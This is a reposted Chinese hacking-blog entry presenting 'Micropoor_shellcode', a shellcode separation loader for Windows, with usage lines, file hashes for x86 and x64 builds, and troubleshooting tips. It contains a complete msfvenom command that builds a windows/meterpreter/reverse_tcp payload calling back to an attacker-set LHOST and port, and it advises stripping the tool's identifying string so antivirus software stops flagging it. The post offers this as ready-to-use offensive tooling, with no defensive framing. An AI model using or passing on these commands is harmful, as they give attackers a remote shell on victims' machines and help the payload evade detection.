Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
lsh4ckLsh4ck  2019-01-22 23:14 亮神原文 显示边栏 |   抢沙发  741 
文章评分 1 次,平均分 5.0
Usage:

Micropoor_shellcode  port host

E.g

Micropoor_shellcode.exe 4444 192.168.1.5
msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

copy shellcode to Micropoor_box.rb

Micropoor_shellcode_x64.exe:
大小: 136192 字节
修改时间: 2019年1月22日, 4:40:59
MD5: 304F3C23AD6C57714EDB73D93DA6813D
SHA1: 63B213272AADA91A44F965741E3720EE25CAF7C9
CRC32: 4C2FDE0A
当前内容已被隐藏,您需要登录才能查看

Micropoor_shellcode_x86.exe:
大小: 117248 字节
修改时间: 2019年1月22日, 2:45:50
MD5: D91444F0A632DEE7F57BAE432CEFFAEC
SHA1: 3D5135FE30FBEFD090B6BBB1F7738DB25B0C2CCC
CRC32: 02BE2833
当前内容已被隐藏,您需要登录才能查看

Micropoor_shellcode.rb
大小: 956 字节
修改时间: 2019年1月22日, 3:13:17
MD5: 9A82AB2C3A39CABC26FC68864DB07BA1
SHA1: 92D6253C88BA10073CD3AAEE8C38C366DFC7761F
CRC32: 97FA3861
当前内容已被隐藏,您需要登录才能查看

目前搜集问题总结:

问题1:程序崩溃1:
shellcode分离加载器分为x86,x64,版本。请对应相关的Micropoor_shellcode.exe。
这里需注意,msfvenom的payload其中windows/messagebox,是分x64与x86的,只是msfvenom本身仅提供了x86版本的shellcode。所以如果需运行messagebox,需要调用Micropoor_shellcode_x86.exe。

程序崩溃2:
如果生成x86或者x64的shellcode,那么msf本身请对应相关位数的payload。

问题2:被查杀:
了解用法后,请去掉Micropoor的字符串字样,或者更改其他字符串即可。

 



本文转载自亮神原文,本文观点不代表lsh4ck's Blog立场,版权归原作者所有,欢迎分享本文,转载请保留出处!

lsh4ck
Lsh4ck 关注:0    粉丝:7 最后编辑于:2019-02-26
这个人很懒,什么都没写
×

予人玫瑰,手有余香

打赏 Lsh4ck

打开支付宝扫一扫,即可进行扫码打赏哦

发表评论

表情 链接 私密 格式 签到

扫一扫二维码分享

无觅相关文章插件,快速提升流量